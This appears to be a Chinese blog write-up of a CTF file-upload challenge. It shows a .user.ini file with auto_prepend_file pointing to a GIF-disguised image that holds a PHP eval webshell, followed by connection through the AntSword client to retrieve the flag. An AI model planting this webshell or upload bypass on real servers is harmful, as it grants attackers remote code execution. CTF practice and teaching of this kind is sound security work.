青少年CTF练习平台~Upload3

Hacker_seagull2026-01-18 17:18

目录

题目链接

https://www.qsnctf.com/

一、题目介绍

这次我学聪明啦!老板说要对上传点进行php的大小写过滤!这下看你怎么办!

二、上传.user.ini文件

bash 复制代码 
auto_prepend_file=shell.png

上传成功

三、上传图片马(shell.png)

bash 复制代码 
GIF89a
<?php @eval($_POST['cmd']);?>

上传成功

四、访问首页文件

当访问 index.php 时,PHP 引擎启动,读取目录下的 .user.ini,发现配置要求先加载 sell.png,于是它会先执行 shell.png 里的恶意代码,再执行首页原本的代码。

五、连接蚁剑

启动蚁剑连接shell(pass:cmd)

http://challenge.qsnctf.com:33578/index.php

连接成功

flag在根目录

flag{8ebfefb382d94eed9e1ef57e401492e7}

相关推荐
见青..16 小时前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
hzhsec17 小时前
启明星辰(安全服务实习生)面试题
网络安全·面试
持敬chijing20 小时前
Web渗透之前后端漏洞-CORS跨越访问漏洞
安全·web安全·网络安全·网络攻击模型·安全威胁分析
HackTwoHub21 小时前
免费FOFA高级会员、DayDaymap、360Quake、Hunter测绘搜索引擎高级会员免费使用最大1W条查询工具
运维·安全·web安全·搜索引擎·网络安全·系统安全·安全架构
学逆向的1 天前
C++纯虚函数
开发语言·c++·网络安全
买大橘子也用券1 天前
玄机-应急响应靶场-第一章wp汇总
网络安全·应急响应
其实防守也摸鱼2 天前
软件安全与漏洞--软件安全编码与防御技术理论题库
开发语言·网络·安全·网络安全·软件安全·软件安全与漏洞
夏天测2 天前
微信小程序自动化漏洞挖掘流水线:从缓存提取到密钥验证全流程实战
python·网络安全·微信小程序·漏洞挖掘
持敬chijing2 天前
Web渗透之前后端漏洞-命令注入
安全·web安全·网络安全·网络攻击模型·安全威胁分析
hhcgchpspk2 天前
xss漏洞学习笔记
笔记·学习·网络安全·xss
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07AI科技热点日报 | 2026年6月1日08上线仅72小时被强制下架:Claude Fable 5 的短命09《置身钉内》原文-可播放阅读10Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析